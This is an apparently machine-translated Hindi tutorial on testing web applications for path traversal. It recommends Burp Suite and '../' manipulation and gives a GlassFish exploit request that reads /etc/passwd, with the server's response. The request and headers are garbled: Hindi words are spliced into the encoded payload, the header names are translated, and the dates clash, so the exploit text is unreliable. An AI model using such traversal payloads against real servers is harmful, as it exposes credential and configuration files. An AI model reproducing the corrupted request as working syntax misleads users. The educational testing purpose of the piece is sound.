पथट्रैवर्सल भेद्यताको यह देखने के लिए एड किया जाता है कि क्या कोई वेब एप्लिकेशन फ़ाइलों या निर्देशिका तक अनधिकृत पहुंच की अनुमति देता है जिसे एक्सेस से वंचित किया जाना चाहिए। इस प्रकार का हमला आवेदन करने के लिए पारित मापदंडों का उपयोग करता है जो उन संसाधनों के रास्तों को दिखाता है जिन पर विशिष्ट संचालन किए जाते हैं, जैसे पढ़ना, लिखना, या निर्देशिका की सामग्री प्रदर्शित करना। नतीजतन, इससे अनावश्यक जानकारी, विन्यास फ़ाइलों और यहां तक कि कोड को दूर से निष्पादित करने की क्षमता का प्रकटीकरण हो सकता है। पथ ट्रैवर्सल भेद्यता सॉफ्टवेयर या उसके कार्यों के विभिन्न तत्वों में हो सकती है। परीक्षण के दौरान छोड़ने के लिए कोई जगह नहीं है, लेकिन विशेष ध्यान देने के लिए विशेषताएं हैं:
- सर्वर से फ़ाइलें डाउनलोड करने के लिए जिम्मेदार विशेषताएं
- एप्लिकेशन सेटिंग्स (टेम्पलेट्स, शैलियों, इंटरफ़ेस भाषा) को लोड करने के लिए जिम्मेदार सुविधाएं
- सर्वर पर फ़ाइलें अपलोड करने के लिए जिम्मेदार कार्य करता है।
पथ ट्रैवर्सल भेद्यता परीक्षण के लिए,आप HTTP प्रॉक्सी जैसे उपयोग कर सकतेहैं। Burp सुइट प्रॉक्सी। आप इसका उपयोग उन मापदंडों में हेरफेर करने के लिए कर सकते हैं जो पथ के मापदंडों जैसे उचित तार जोड़कर पथ का प्रतिनिधित्व करते हैं। ".. /", वर्तमान में प्रसंस्कृत निर्देशिका से "बाहर कूद" के उद्देश्य से । निम्नलिखित ग्राफिक में एक उदाहरण:
![http प्रॉक्सी पथ ट्रैवर्सल कमजोरियों का परीक्षण करने के लिए इस्तेमाल किया जा सकता है, उदाहरण के लिए Burp सुइट प्रॉक्सी](https://sp-ao.shortpixel.ai/client/to_auto,q_lossy,ret_img,w_768,h_342/https://my127001.pl/wp-content/uploads/2019/01/pathtraversal.png)
पथ ट्रैवर्सल भेद्यता का एक और उदाहरण ग्लासफिश एप्लिकेशन सर्वर पर पाया जाने वाला अगस्त 2015 बग हो सकता है। उचित अनुरोध को कॉल करना, जैसा कि नीचे दिखाया गया है, किसी भी फ़ाइल को डिस्क से पढ़ने की अनुमति दी गई:
GET /theme/%c0%ae%c0%ae%c0%c0%ae%c0%c0%c0%c0%c0%c0%ae%c0%c0%c0%c0%c0%c एई% c0% ae%c0%c0%c0%ae%c0%c0%c0%c0%ae%c0%c0%c0%ae%ae%c 0% एई% ce% ce%c0%ae%c0%ae%ae%af%c0%c0%c0%ae%c0%c0%ae%ae%% c0%afetc%c0%afpasswd
HTTP/1.1
मेजबान: 127.0.0.1:4848
स्वीकार करें: */*
स्वीकार करें-भाषा: एन
कनेक्शन: बंद
इसके जवाब में, सर्वर /आदि/passwd फ़ाइल की सामग्री देता है:
HTTP/1.1 200 OK
सर्वर: ग्लासफिश सर्वर ओपन सोर्स एडिशन 4.1
एक्स-पावर्ड-बाय: सर्वलेट/3.1 जेएसपी/2.3 (ग्लासफिश सर्वर ओपन सोर्स एडिशन 4.1
जावा/ओरेकल कॉर्पोरेशन/1.7)
लास्ट-मॉडिफाइड: मंगल, 13 जनवरी 2015 10:00:00 GMT
तिथि: Tue, 10 जनवरी 2015 10:00:00 GMT
कनेक्शन: क्लोज
कंटेंट-लेंथ: 1087
रूट:!:16436:0:99999:7::
डेमन:*:16273:0:99999:7::
बिन:*:16273:0:99999:7::
sys:*:16273:0:99999:7::
सिंक::16273:0:99999:7::
[...]